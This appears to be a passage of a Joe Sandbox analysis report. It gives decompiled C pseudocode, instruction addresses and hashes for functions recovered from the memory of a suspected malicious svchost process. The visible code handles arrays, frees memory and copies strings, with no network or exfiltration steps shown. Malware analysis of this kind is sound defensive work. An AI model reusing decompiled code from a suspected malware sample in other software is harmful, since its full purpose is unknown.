                                                                                                                                                                                                                                                                          						_t210 = _v100;
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                                          							_v84 =  *((intOrPtr*)(_v100 + 0x34));
                                                                                                                                                                                                                                                                          							_t210 = E04020CC0(_v84);
                                                                                                                                                                                                                                                                          							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v100 + 0x34)) = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 0x44)) > 0) {
                                                                                                                                                                                                                                                                          					_t210 = _v100;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						while(_v20 <  *((intOrPtr*)(_v100 + 0x44))) {
                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) != 0) {
                                                                                                                                                                                                                                                                          								_v92 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4));
                                                                                                                                                                                                                                                                          								_v88 = _v92;
                                                                                                                                                                                                                                                                          								if(_v88 == 0) {
                                                                                                                                                                                                                                                                          									_v128 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v128 = E040051F0(_v88, 1);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t210 = _v100;
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                                          							_v96 =  *((intOrPtr*)(_v100 + 0x40));
                                                                                                                                                                                                                                                                          							_t213 = E04020CC0(_v96);
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v100 + 0x40)) = 0x666;
                                                                                                                                                                                                                                                                          							return _t213;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t210;
                                                                                                                                                                                                                                                                          			}





































                                                                                                                                                                                                                                                                          0x04023c96
                                                                                                                                                                                                                                                                          0x04023ca0
                                                                                                                                                                                                                                                                          0x04023ca8
                                                                                                                                                                                                                                                                          0x04023cae
                                                                                                                                                                                                                                                                          0x04023cb5
                                                                                                                                                                                                                                                                          0x04023cc6
                                                                                                                                                                                                                                                                          0x04023cb7
                                                                                                                                                                                                                                                                          0x04023cc1
                                                                                                                                                                                                                                                                          0x04023cc1
                                                                                                                                                                                                                                                                          0x04023cd0
                                                                                                                                                                                                                                                                          0x04023cd0
                                                                                                                                                                                                                                                                          0x04023cde
                                                                                                                                                                                                                                                                          0x04023ce6
                                                                                                                                                                                                                                                                          0x04023ced
                                                                                                                                                                                                                                                                          0x04023cf2
                                                                                                                                                                                                                                                                          0x04023cf8
                                                                                                                                                                                                                                                                          0x04023cf8
                                                                                                                                                                                                                                                                          0x04023d06
                                                                                                                                                                                                                                                                          0x04023d0e
                                                                                                                                                                                                                                                                          0x04023d14
                                                                                                                                                                                                                                                                          0x04023d1b
                                                                                                                                                                                                                                                                          0x04023d2c
                                                                                                                                                                                                                                                                          0x04023d1d
                                                                                                                                                                                                                                                                          0x04023d27
                                                                                                                                                                                                                                                                          0x04023d27
                                                                                                                                                                                                                                                                          0x04023d36
                                                                                                                                                                                                                                                                          0x04023d36
                                                                                                                                                                                                                                                                          0x04023d3d
                                                                                                                                                                                                                                                                          0x04023d44
                                                                                                                                                                                                                                                                          0x04023d4c
                                                                                                                                                                                                                                                                          0x04023d4f
                                                                                                                                                                                                                                                                          0x04023d52
                                                                                                                                                                                                                                                                          0x04023d59
                                                                                                                                                                                                                                                                          0x04023d6a
                                                                                                                                                                                                                                                                          0x04023d5b
                                                                                                                                                                                                                                                                          0x04023d60
                                                                                                                                                                                                                                                                          0x04023d65
                                                                                                                                                                                                                                                                          0x04023d65
                                                                                                                                                                                                                                                                          0x04023d74
                                                                                                                                                                                                                                                                          0x04023d74
                                                                                                                                                                                                                                                                          0x04023d82
                                                                                                                                                                                                                                                                          0x04023d88
                                                                                                                                                                                                                                                                          0x04023d8f
                                                                                                                                                                                                                                                                          0x04023d95
                                                                                                                                                                                                                                                                          0x04023da7
                                                                                                                                                                                                                                                                          0x04023dbf
                                                                                                                                                                                                                                                                          0x04023dcd
                                                                                                                                                                                                                                                                          0x04023dd3
                                                                                                                                                                                                                                                                          0x04023dda
                                                                                                                                                                                                                                                                          0x04023deb
                                                                                                                                                                                                                                                                          0x04023ddc
                                                                                                                                                                                                                                                                          0x04023de6
                                                                                                                                                                                                                                                                          0x04023de6
                                                                                                                                                                                                                                                                          0x04023dfb
                                                                                                                                                                                                                                                                          0x04023dfb
                                                                                                                                                                                                                                                                          0x04023da4
                                                                                                                                                                                                                                                                          0x04023da4
                                                                                                                                                                                                                                                                          0x04023e04
                                                                                                                                                                                                                                                                          0x04023e0b
                                                                                                                                                                                                                                                                          0x04023e13
                                                                                                                                                                                                                                                                          0x04023e1a
                                                                                                                                                                                                                                                                          0x04023e1f
                                                                                                                                                                                                                                                                          0x04023e25
                                                                                                                                                                                                                                                                          0x04023e25
                                                                                                                                                                                                                                                                          0x04023e0b
                                                                                                                                                                                                                                                                          0x04023d8f
                                                                                                                                                                                                                                                                          0x04023e33
                                                                                                                                                                                                                                                                          0x04023e39
                                                                                                                                                                                                                                                                          0x04023e40
                                                                                                                                                                                                                                                                          0x04023e46
                                                                                                                                                                                                                                                                          0x04023e58
                                                                                                                                                                                                                                                                          0x04023e70
                                                                                                                                                                                                                                                                          0x04023e7e
                                                                                                                                                                                                                                                                          0x04023e84
                                                                                                                                                                                                                                                                          0x04023e8b
                                                                                                                                                                                                                                                                          0x04023e9c
                                                                                                                                                                                                                                                                          0x04023e8d
                                                                                                                                                                                                                                                                          0x04023e97
                                                                                                                                                                                                                                                                          0x04023e97
                                                                                                                                                                                                                                                                          0x04023eac
                                                                                                                                                                                                                                                                          0x04023eac
                                                                                                                                                                                                                                                                          0x04023e55
                                                                                                                                                                                                                                                                          0x04023e55
                                                                                                                                                                                                                                                                          0x04023eb5
                                                                                                                                                                                                                                                                          0x04023ebc
                                                                                                                                                                                                                                                                          0x04023ec4
                                                                                                                                                                                                                                                                          0x04023ecb
                                                                                                                                                                                                                                                                          0x04023ed0
                                                                                                                                                                                                                                                                          0x04023ed6
                                                                                                                                                                                                                                                                          0x04023ed6
                                                                                                                                                                                                                                                                          0x04023ebc
                                                                                                                                                                                                                                                                          0x04023e40
                                                                                                                                                                                                                                                                          0x04023ee4
                                                                                                                                                                                                                                                                          0x04023eea
                                                                                                                                                                                                                                                                          0x04023ef1
                                                                                                                                                                                                                                                                          0x04023ef7
                                                                                                                                                                                                                                                                          0x04023f09
                                                                                                                                                                                                                                                                          0x04023f21
                                                                                                                                                                                                                                                                          0x04023f2f
                                                                                                                                                                                                                                                                          0x04023f35
                                                                                                                                                                                                                                                                          0x04023f3c
                                                                                                                                                                                                                                                                          0x04023f4d
                                                                                                                                                                                                                                                                          0x04023f3e
                                                                                                                                                                                                                                                                          0x04023f48
                                                                                                                                                                                                                                                                          0x04023f48
                                                                                                                                                                                                                                                                          0x04023f5d
                                                                                                                                                                                                                                                                          0x04023f5d
                                                                                                                                                                                                                                                                          0x04023f06
                                                                                                                                                                                                                                                                          0x04023f06
                                                                                                                                                                                                                                                                          0x04023f66
                                                                                                                                                                                                                                                                          0x04023f6d
                                                                                                                                                                                                                                                                          0x04023f75
                                                                                                                                                                                                                                                                          0x04023f7c
                                                                                                                                                                                                                                                                          0x04023f81
                                                                                                                                                                                                                                                                          0x04023f87
                                                                                                                                                                                                                                                                          0x04023f87
                                                                                                                                                                                                                                                                          0x04023f6d
                                                                                                                                                                                                                                                                          0x04023ef1
                                                                                                                                                                                                                                                                          0x04023f95
                                                                                                                                                                                                                                                                          0x04023f9b
                                                                                                                                                                                                                                                                          0x04023fa2
                                                                                                                                                                                                                                                                          0x04023fa8
                                                                                                                                                                                                                                                                          0x04023fba
                                                                                                                                                                                                                                                                          0x04023fd2
                                                                                                                                                                                                                                                                          0x04023fe0
                                                                                                                                                                                                                                                                          0x04023fe6
                                                                                                                                                                                                                                                                          0x04023fed
                                                                                                                                                                                                                                                                          0x04023ffe
                                                                                                                                                                                                                                                                          0x04023fef
                                                                                                                                                                                                                                                                          0x04023ff9
                                                                                                                                                                                                                                                                          0x04023ff9
                                                                                                                                                                                                                                                                          0x0402400e
                                                                                                                                                                                                                                                                          0x0402400e
                                                                                                                                                                                                                                                                          0x04023fb7
                                                                                                                                                                                                                                                                          0x04023fb7
                                                                                                                                                                                                                                                                          0x04024017
                                                                                                                                                                                                                                                                          0x0402401e
                                                                                                                                                                                                                                                                          0x04024026
                                                                                                                                                                                                                                                                          0x0402402d
                                                                                                                                                                                                                                                                          0x04024038
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04024038
                                                                                                                                                                                                                                                                          0x0402401e
                                                                                                                                                                                                                                                                          0x04023fa2
                                                                                                                                                                                                                                                                          0x04024042

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                          • Opcode ID: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                                          • Instruction ID: a3cb5fddb2616e01ffbd0549c63a57f7e4090b46a873f7d090d06a3cf8222b0d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E18374A00328DFDB58CF94D998BADBBB2BF49308F244159D8096B391D776AD86CF40
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                          			E04024820(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr* _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _t114;
                                                                                                                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                          				signed char _t124;
                                                                                                                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                                                                                          				void* _t198;
                                                                                                                                                                                                                                                                          				void* _t199;
                                                                                                                                                                                                                                                                          				void* _t200;
                                                                                                                                                                                                                                                                          				void* _t201;
                                                                                                                                                                                                                                                                          				void* _t203;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t199 = __esi;
                                                                                                                                                                                                                                                                          				_t198 = __edi;
                                                                                                                                                                                                                                                                          				_t146 = __ebx;
                                                                                                                                                                                                                                                                          				_v64 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				L1:
                                                                                                                                                                                                                                                                          				while(_a4 >= 0) {
                                                                                                                                                                                                                                                                          					_v28 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x18));
                                                                                                                                                                                                                                                                          					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x14));
                                                                                                                                                                                                                                                                          					if(_v28 != 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                          						_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _a4 * 4));
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_v20 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                          							E040114D0( *_v64, _a4, 0, 1, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                                          							_t114 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t201 = _t200 + 4;
                                                                                                                                                                                                                                                                          							_v36 = _t114;
                                                                                                                                                                                                                                                                          							if(_v36 == 0) {
                                                                                                                                                                                                                                                                          								_v68 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v68 = E0401F4E0(_v36);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v12 = _v68;
                                                                                                                                                                                                                                                                          							E0401FC90(_t146, _v12, _t198, _t199,  *((intOrPtr*)(_v28 + 0x1c)), E040070A0( *((intOrPtr*)(_v28 + 0x1c))));
                                                                                                                                                                                                                                                                          							_t119 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t203 = _t201 + 8;
                                                                                                                                                                                                                                                                          							_v40 = _t119;
                                                                                                                                                                                                                                                                          							if(_v40 == 0) {
                                                                                                                                                                                                                                                                          								_v72 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v72 = E0401F4E0(_v40);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v24 = _v72;
                                                                                                                                                                                                                                                                          							_t121 = E040070A0( *((intOrPtr*)(_v28 + 0x20)));
                                                                                                                                                                                                                                                                          							_t200 = _t203 + 4;
                                                                                                                                                                                                                                                                          							_t189 =  *((intOrPtr*)(_v28 + 0x20));
                                                                                                                                                                                                                                                                          							E0401FC90(_t146, _v24, _t198, _t199,  *((intOrPtr*)(_v28 + 0x20)), _t121);
                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                          								_t124 = E04015C60(_t146,  *_v64, _t189, _v12);
                                                                                                                                                                                                                                                                          								_t190 = _t124 & 0x000000ff;
                                                                                                                                                                                                                                                                          								if((_t124 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if((E04015C60(_t146,  *_v64, _t190, _v24) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									E040114D0( *_v64, _a4, 0, 0, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                                          									_v32 = E040246A0(_t146, _v64, _t198, _t199);
                                                                                                                                                                                                                                                                          									if(_v32 != 0) {
                                                                                                                                                                                                                                                                          										_t130 = E04020CE0(0x14);
                                                                                                                                                                                                                                                                          										_t200 = _t200 + 4;
                                                                                                                                                                                                                                                                          										_v44 = _t130;
                                                                                                                                                                                                                                                                          										if(_v44 == 0) {
                                                                                                                                                                                                                                                                          											_v76 = 0;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_v76 = E04006060(_v44);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_v8 = _v76;
                                                                                                                                                                                                                                                                          										 *_v8 = E040242C0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_v8 + 4)) = E040243F0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_v8 + 8)) = E04024180(_t146, _v64, _t198, _t199, _v24);
                                                                                                                                                                                                                                                                          										_t195 = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                          										if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          											_t79 = _v20 + 0xc; // 0xc7077400
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v8 + 0xc)) = E040240B0(_t146, _v64, _t195, _t198, _t199,  *_t79);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_v8 + 0x10)) = _v32;
                                                                                                                                                                                                                                                                          										_t189 = 0;
                                                                                                                                                                                                                                                                          										if(0 != 0) {
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                                                                                          								if(_v12 != 0) {
                                                                                                                                                                                                                                                                          									_v52 = _v12;
                                                                                                                                                                                                                                                                          									_v48 = _v52;
                                                                                                                                                                                                                                                                          									if(_v48 == 0) {
                                                                                                                                                                                                                                                                          										_v80 = 0;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v80 = E04004EA0(_v48, 1);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v12 = 0x666;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v24 != 0) {
                                                                                                                                                                                                                                                                          									_v60 = _v24;
                                                                                                                                                                                                                                                                          									_v56 = _v60;
                                                                                                                                                                                                                                                                          									if(_v56 == 0) {
                                                                                                                                                                                                                                                                          										_v84 = 0;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v84 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v24 = 0x666;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(0 != 0) {
                                                                                                                                                                                                                                                                          									goto L1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								goto L38;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L27;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L38;
                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                          0x04024820
                                                                                                                                                                                                                                                                          0x04024820
                                                                                                                                                                                                                                                                          0x04024820
                                                                                                                                                                                                                                                                          0x04024826
                                                                                                                                                                                                                                                                          0x04024829
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04024830
                                                                                                                                                                                                                                                                          0x04024844
                                                                                                                                                                                                                                                                          0x04024850
                                                                                                                                                                                                                                                                          0x04024857
                                                                                                                                                                                                                                                                          0x04024870
                                                                                                                                                                                                                                                                          0x0402487a
                                                                                                                                                                                                                                                                          0x04024893
                                                                                                                                                                                                                                                                          0x0402489a
                                                                                                                                                                                                                                                                          0x0402489f
                                                                                                                                                                                                                                                                          0x040248a2
                                                                                                                                                                                                                                                                          0x040248a9
                                                                                                                                                                                                                                                                          0x040248b8
                                                                                                                                                                                                                                                                          0x040248ab
                                                                                                                                                                                                                                                                          0x040248b3
                                                                                                                                                                                                                                                                          0x040248b3
                                                                                                                                                                                                                                                                          0x040248c2
                                                                                                                                                                                                                                                                          0x040248df
                                                                                                                                                                                                                                                                          0x040248e6
                                                                                                                                                                                                                                                                          0x040248eb
                                                                                                                                                                                                                                                                          0x040248ee
                                                                                                                                                                                                                                                                          0x040248f5
                                                                                                                                                                                                                                                                          0x04024904
                                                                                                                                                                                                                                                                          0x040248f7
                                                                                                                                                                                                                                                                          0x040248ff
                                                                                                                                                                                                                                                                          0x040248ff
                                                                                                                                                                                                                                                                          0x0402490e
                                                                                                                                                                                                                                                                          0x04024918
                                                                                                                                                                                                                                                                          0x0402491d
                                                                                                                                                                                                                                                                          0x04024924
                                                                                                                                                                                                                                                                          0x0402492b
                                                                                                                                                                                                                                                                          0x04024930
                                                                                                                                                                                                                                                                          0x04024939
                                                                                                                                                                                                                                                                          0x0402493e
                                                                                                                                                                                                                                                                          0x04024943
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0402495d
                                                                                                                                                                                                                                                                          0x04024976
                                                                                                                                                                                                                                                                          0x04024983
                                                                                                                                                                                                                                                                          0x0402498a
                                                                                                                                                                                                                                                                          0x04024993
                                                                                                                                                                                                                                                                          0x04024998
                                                                                                                                                                                                                                                                          0x0402499b
                                                                                                                                                                                                                                                                          0x040249a2
                                                                                                                                                                                                                                                                          0x040249b1
                                                                                                                                                                                                                                                                          0x040249a4
                                                                                                                                                                                                                                                                          0x040249ac
                                                                                                                                                                                                                                                                          0x040249ac
                                                                                                                                                                                                                                                                          0x040249bb
                                                                                                                                                                                                                                                                          0x040249cd
                                                                                                                                                                                                                                                                          0x040249de
                                                                                                                                                                                                                                                                          0x040249f0
                                                                                                                                                                                                                                                                          0x040249f3
                                                                                                                                                                                                                                                                          0x040249f9
                                                                                                                                                                                                                                                                          0x040249fe
                                                                                                                                                                                                                                                                          0x04024a0d
                                                                                                                                                                                                                                                                          0x04024a0d
                                                                                                                                                                                                                                                                          0x04024a16
                                                                                                                                                                                                                                                                          0x04024a19
                                                                                                                                                                                                                                                                          0x04024a1b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0402498c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0402495f
                                                                                                                                                                                                                                                                          0x04024a21
                                                                                                                                                                                                                                                                          0x04024a25
                                                                                                                                                                                                                                                                          0x04024a2a
                                                                                                                                                                                                                                                                          0x04024a30
                                                                                                                                                                                                                                                                          0x04024a37
                                                                                                                                                                                                                                                                          0x04024a48
                                                                                                                                                                                                                                                                          0x04024a39
                                                                                                                                                                                                                                                                          0x04024a43
                                                                                                                                                                                                                                                                          0x04024a43
                                                                                                                                                                                                                                                                          0x04024a4f
                                                                                                                                                                                                                                                                          0x04024a4f
                                                                                                                                                                                                                                                                          0x04024a5a
                                                                                                                                                                                                                                                                          0x04024a5f
                                                                                                                                                                                                                                                                          0x04024a65
                                                                                                                                                                                                                                                                          0x04024a6c
                                                                                                                                                                                                                                                                          0x04024a7d
                                                                                                                                                                                                                                                                          0x04024a6e
                                                                                                                                                                                                                                                                          0x04024a78
                                                                                                                                                                                                                                                                          0x04024a78
                                                                                                                                                                                                                                                                          0x04024a84
                                                                                                                                                                                                                                                                          0x04024a84
                                                                                                                                                                                                                                                                          0x04024a8d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04024a8d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0402487c
                                                                                                                                                                                                                                                                          0x0402487a
                                                                                                                                                                                                                                                                          0x04024a93
                                                                                                                                                                                                                                                                          0x04024a99
                                                                                                                                                                                                                                                                          0x04024a99
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                                          • Instruction ID: a5d7251e2747225a00ddcb09f2389310aff70beb4688250c6b3f934d2e6ae519
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0491C6B4E00229EFDB08DF94D594BAEBBB1BF88308F148059E9157B390DB75A941CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                                                                          			E04013410(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                          				void _v96;
                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                                                                                                                          				void* _v116;
                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                          				intOrPtr* _v128;
                                                                                                                                                                                                                                                                          				intOrPtr _v132;
                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                          				intOrPtr _t87;
                                                                                                                                                                                                                                                                          				intOrPtr _t95;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          				signed int _t142;
                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t98 = __ebx;
                                                                                                                                                                                                                                                                          				_v12 =  *0x429024 ^ _t142;
                                                                                                                                                                                                                                                                          				_v128 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0) {
                                                                                                                                                                                                                                                                          					memcpy( &_v60, 0x426ef4, 0xb << 2);
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					memcpy( &_v96, 0x426f24, 8 << 2);
                                                                                                                                                                                                                                                                          					_t145 = _t143 + 0x18;
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					if( *(_a4 + 0x24) >= 0) {
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)( *_v128 + 0x2c)) >  *(_a4 + 0x24)) {
                                                                                                                                                                                                                                                                          							_v108 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                                          							_v104 = _v108 + 0x1e;
                                                                                                                                                                                                                                                                          							_v116 = E04020CE0(_v104 + 1);
                                                                                                                                                                                                                                                                          							_v100 = _v116;
                                                                                                                                                                                                                                                                          							E04007010(0x426f34, _v100, 0, _v104 + 1);
                                                                                                                                                                                                                                                                          							 *0x4251f8(_v100, _v104 + 1,  &_v96,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                                          							_t87 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t143 = _t145 + 0x28;
                                                                                                                                                                                                                                                                          							_v120 = _t87;
                                                                                                                                                                                                                                                                          							if(_v120 == 0) {
                                                                                                                                                                                                                                                                          								_v136 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v136 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t133 = _v136;
                                                                                                                                                                                                                                                                          							_v8 = _v136;
